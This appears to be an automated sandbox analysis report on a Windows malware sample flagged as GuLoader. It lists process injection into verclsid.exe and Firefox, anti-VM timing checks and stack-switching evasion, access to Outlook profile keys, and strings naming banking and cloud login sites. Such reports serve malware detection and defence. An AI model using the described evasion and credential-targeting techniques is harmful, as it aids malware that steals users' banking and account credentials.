Source: C:\Users\user\Desktop\Anfrage_244384.exe

File read: C:\Users\user\Desktop\Anfrage_244384.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Anfrage_244384.exe

Static file information: File size 1240824 > 1048576

Source: Anfrage_244384.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dptLotHBnXg.exe, 00000006.00000000.3013372549.00000000009CE000.00000002.00000001.01000000.00000009.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174453120.00000000009CE000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Anfrage_244384.exe, Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: verclsid.pdbGCTL source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: verclsid.pdb source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_10002D20 push eax; ret	0_2_10002D4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346427FA pushad ; ret	4_2_346427F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3464225F pushad ; ret	4_2_346427F9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3464283D push eax; iretd	4_2_34642858
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346709AD push ecx; mov dword ptr [esp], ecx	4_2_346709B6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045909AD push ecx; mov dword ptr [esp], ecx	7_2_045909B6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C0B37 push ds; iretd	7_2_003C0B40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CEC80 push edx; retn 134Bh	7_2_003CED83
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C4FF9 push 00000065h; retf	7_2_003C500E
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C7306 pushad ; ret	7_2_003C7304
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C74CD push esp; retf	7_2_003C74D1
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CBFC7 push eax; iretd	7_2_003CBFCC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5491 push ds; retf	7_2_048B549F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B659E push 00000051h; iretd	7_2_048B65B2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5564 push eax; retf	7_2_048B5566
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC6E5 push ecx; iretd	7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC60A push ecx; iretd	7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC67D push ecx; iretd	7_2_048BC6AD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B47B3 push edi; ret	7_2_048B47BA
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BD02C push FFFFFFF7h; ret	7_2_048BD02F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BB2A4 pushfd ; ret	7_2_048BB305
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B6258 push esp; ret	7_2_048B6259
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B737C pushfd ; iretd	7_2_048B73BC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BBD56 pushfd ; retf	7_2_048BBD57
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5E2D push ecx; retf	7_2_048B5E39
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B5E46 push ebp; ret	7_2_048B5E61
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC813 pushfd ; ret	7_2_048BC814
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BC869 push edi; iretd	7_2_048BC86A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B596F push 0000002Ch; ret	7_2_048B5978
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B0BAE push edx; iretd	7_2_048B0BBD
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048B0BBE push FFFFFFFDh; iretd	7_2_048B0BC0

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API/Special instruction interceptor: Address: 4D102F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	API/Special instruction interceptor: Address: 38D02F6
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Anfrage_244384.exe	RDTSC instruction interceptor: First address: 4CD3731 second address: 4CD3731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1534B1992Bh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1534B19905h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Anfrage_244384.exe	RDTSC instruction interceptor: First address: 3893731 second address: 3893731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15350784ABh 0x00000004 test bh, ah 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F1535078485h 0x0000000a test dl, bl 0x0000000c inc ebp 0x0000000d test edx, 1E38E0C7h 0x00000013 inc ebx 0x00000014 rdtsc

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_347416A6 rdtsc

4_2_347416A6

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API coverage: 0.2 %
Source: C:\Windows\SysWOW64\verclsid.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\verclsid.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405665
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_0040270B FindFirstFileA,	0_2_0040270B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_004060C7 FindFirstFileA,FindClose,	0_2_004060C7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CC460 FindFirstFileW,FindNextFileW,FindClose,	7_2_003CC460

Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 02-E8420l.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 02-E8420l.7.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: merica.comVMware20,11696487552\|UE
Source: 02-E8420l.7.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 02-E8420l.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Anfrage_244384.exe, 00000004.00000003.2993262650.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2992975055.00000000043CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 02-E8420l.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 02-E8420l.7.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552u
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8J=
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116
Source: 02-E8420l.7.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000805000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362395237.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 02-E8420l.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 02-E8420l.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 02-E8420l.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169648E
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ebrokers.co.inVMware20,11696487552d
Source: 02-E8420l.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 02-E8420l.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 02-E8420l.7.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 02-E8420l.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: verclsid.exe, 00000007.00000002.3365232559.0000000007752000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CDYNVMware20,116,)
Source: 02-E8420l.7.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 02-E8420l.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 02-E8420l.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 02-E8420l.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 02-E8420l.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 02-E8420l.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Anfrage_244384.exe	API call chain: ExitProcess graph end node			graph_0-3753
Source: C:\Users\user\Desktop\Anfrage_244384.exe	API call chain: ExitProcess graph end node			graph_0-3939

Source: C:\Windows\SysWOW64\verclsid.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\verclsid.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_347416A6 rdtsc

4_2_347416A6

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk,

4_2_346B35C0

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]	4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]	4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]	4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]	4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460 mov eax, dword ptr fs:[00000030h]	4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]	4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]	4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]	4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]	4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]	4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F460 mov eax, dword ptr fs:[00000030h]	4_2_3468F460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474547F mov eax, dword ptr fs:[00000030h]	4_2_3474547F
